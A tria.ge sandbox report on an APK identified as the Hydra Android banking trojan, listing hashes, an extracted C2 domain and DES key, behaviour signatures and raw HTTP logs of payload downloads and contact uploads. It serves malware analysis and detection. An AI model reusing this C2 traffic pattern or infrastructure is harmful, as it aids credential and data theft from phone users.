Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

6

2578dc5149...c0.apk

android-9-x86

10

2578dc5149...c0.apk

android-10-x64

10

2578dc5149...c0.apk

android-11-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    android-11_x64
  • resource
    android-x64-arm64-20240910-en
  • resource tags

    arch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20240910-enlocale:en-usos:android-11-x64system
  • submitted
    16/02/2025, 22:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk

  • Size

    4.6MB

  • MD5

    0d7bb33151d9a98973e47fe54a885eb1

  • SHA1

    0a6a1644ba3e459d1ccd949e4c55736a92c04206

  • SHA256

    2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0

  • SHA512

    99172dfbf2c7dbf8da541b154b5f29c1c489d5d324fcf491b3f5916a8b7602de1418e86b453aed455bdcc5f02dcc69fb371e7835f8b7e2951f14760df75524cc

  • SSDEEP

    98304:VffTfxT5uY19NmMy0dL5jTS4ovGniG3ElCGYlq9VvdravEXjvC:xfxT57bzV3r60i/lhiMvPq

Score
10/10
hydrabankercollectioncredential_accessdefense_evasiondiscoveryevasioninfostealerpersistencetrojan

Malware Config

Extracted

Family

hydra

C2

http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org

DES_key
1
7670707070676879

Signatures

  • Hydra

    Android banker and info stealer.

    bankertrojaninfostealerhydra
  • Hydra family
    hydra
  • Hydra payload 2 IoCs
  • Loads dropped Dex/Jar 1 TTPs 2 IoCs

    Runs executable file dropped to the device during analysis.

    evasion
  • Makes use of the framework's Accessibility service 4 TTPs 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

    collectiondefense_evasioncredential_access
  • Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
    bankerdiscovery
  • Reads the contacts stored on the device. 1 TTPs 1 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Makes use of the framework's foreground persistence service 1 TTPs 1 IoCs

    Application may abuse the framework's foreground service to continue running in the foreground.

    defense_evasionpersistence
  • Performs UI accessibility actions on behalf of the user 1 TTPs 1 IoCs

    Application may abuse the accessibility service to prevent their removal.

    evasion
  • Queries information about active data network 1 TTPs 1 IoCs
    discovery
  • Queries the mobile country code (MCC) 1 TTPs 1 IoCs
    discovery
  • Reads information about phone network operator. 1 TTPs
    discovery
  • Requests uninstalling the application. 1 TTPs 1 IoCs
    defense_evasion

Processes

  • com.dfzmabwby.wbpjhioxj
    1⤵
    • Loads dropped Dex/Jar
    • Makes use of the framework's Accessibility service
    • Reads the contacts stored on the device.
    • Makes use of the framework's foreground persistence service
    • Performs UI accessibility actions on behalf of the user
    • Queries information about active data network
    • Queries the mobile country code (MCC)
    • Requests uninstalling the application.
    PID:4796

Network

  • flag-au
    DNS
    www.youtube.com
    Remote address:
    1.1.1.1:53
    Request
    www.youtube.com
    IN A
    Response
    www.youtube.com
    IN CNAME
    youtube-ui.l.google.com
    youtube-ui.l.google.com
    IN A
    142.250.200.14
    youtube-ui.l.google.com
    IN A
    216.58.212.206
    youtube-ui.l.google.com
    IN A
    142.250.180.14
    youtube-ui.l.google.com
    IN A
    142.250.200.46
    youtube-ui.l.google.com
    IN A
    216.58.213.14
    youtube-ui.l.google.com
    IN A
    216.58.201.110
    youtube-ui.l.google.com
    IN A
    142.250.187.238
    youtube-ui.l.google.com
    IN A
    142.250.187.206
    youtube-ui.l.google.com
    IN A
    172.217.16.238
    youtube-ui.l.google.com
    IN A
    172.217.169.78
    youtube-ui.l.google.com
    IN A
    216.58.204.78
    youtube-ui.l.google.com
    IN A
    142.250.179.238
    youtube-ui.l.google.com
    IN A
    142.250.178.14
  • flag-au
    DNS
    www.youtube.com
    Remote address:
    1.1.1.1:53
    Request
    www.youtube.com
    IN A
  • flag-au
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.187.238
  • flag-au
    DNS
    1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Remote address:
    1.1.1.1:53
    Request
    1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    IN A
    Response
    1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    IN A
    62.60.226.33
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/payload
    Remote address:
    62.60.226.33:80
    Request
    GET /payload HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:28 GMT
    Content-Type: application/octet-stream
    Content-Length: 997816
    Connection: keep-alive
    Last-Modified: Sat, 21 Sep 2024 12:25:51 GMT
    ETag: "66eebb4f-f39b8"
    Accept-Ranges: bytes
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:10 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/mirrors
    Remote address:
    62.60.226.33:80
    Request
    GET /api/mirrors HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
    Content-Encoding: gzip
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:28 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/lock
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/lock HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 18
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:29 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 166
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:43 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 7503
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:45 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Remote address:
    62.60.226.33:80
    Request
    GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:50 GMT
    Content-Type: application/zip
    Content-Length: 77713084
    Connection: keep-alive
    Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
    ETag: "67ad9e61-4a1cebc"
    Content-Range: bytes 0-77713083/77713084
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:30 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/update
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/update HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 31
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:43 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-au
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    216.58.213.8
  • flag-au
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
  • flag-au
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json
    Remote address:
    208.95.112.1:80
    Request
    GET /json HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: ip-api.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Feb 2025 22:01:43 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 288
    Access-Control-Allow-Origin: *
    X-Ttl: 22
    X-Rl: 43
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/contacts
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/contacts HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 15
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:01:43 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:30 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:31 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Remote address:
    62.60.226.33:80
    Request
    GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:51 GMT
    Content-Type: application/zip
    Content-Length: 77713084
    Connection: keep-alive
    Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
    ETag: "67ad9e61-4a1cebc"
    Content-Range: bytes 0-77713083/77713084
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:02:51 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Remote address:
    62.60.226.33:80
    Request
    GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:12 GMT
    Content-Type: application/zip
    Content-Length: 77713084
    Connection: keep-alive
    Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
    ETag: "67ad9e61-4a1cebc"
    Content-Range: bytes 0-77713083/77713084
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:12 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:30 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:31 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    GET
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true
    Remote address:
    62.60.226.33:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-de
    POST
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    Remote address:
    62.60.226.33:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 94c11700a1abeaf9
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 16 Feb 2025 22:03:51 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • 172.217.169.14:443
    https
    1.5kB
     40 B
     2
    1
  • 142.250.187.238:443
    android.apis.google.com
    tls
    2.6kB
     6.0kB
     12
    10
  • 142.250.187.238:443
    android.apis.google.com
    tls
    2.6kB
     6.1kB
     11
    9
  • 216.239.32.223:443
    tls, https
    128 B
     40 B
     2
    1
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    29.0kB
     1.1MB
     492
    677

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/payload

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    http
    61.9kB
     2.0MB
     741
    1190

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/mirrors

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/lock

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip

    HTTP Response

    206
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    2.6kB
     1.4kB
     18
    13

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/update

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 142.250.200.14:443
    www.youtube.com
    tls
    2.3kB
     8.4kB
     20
    16
  • 216.58.213.8:443
    ssl.google-analytics.com
    tls
    1.6kB
     6.3kB
     11
    9
  • 208.95.112.1:80
    http://ip-api.com/json
    http
    412 B
     597 B
     4
    3

    HTTP Request

    GET http://ip-api.com/json

    HTTP Response

    200
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    2.4kB
     22.6kB
     25
    25

    HTTP Request

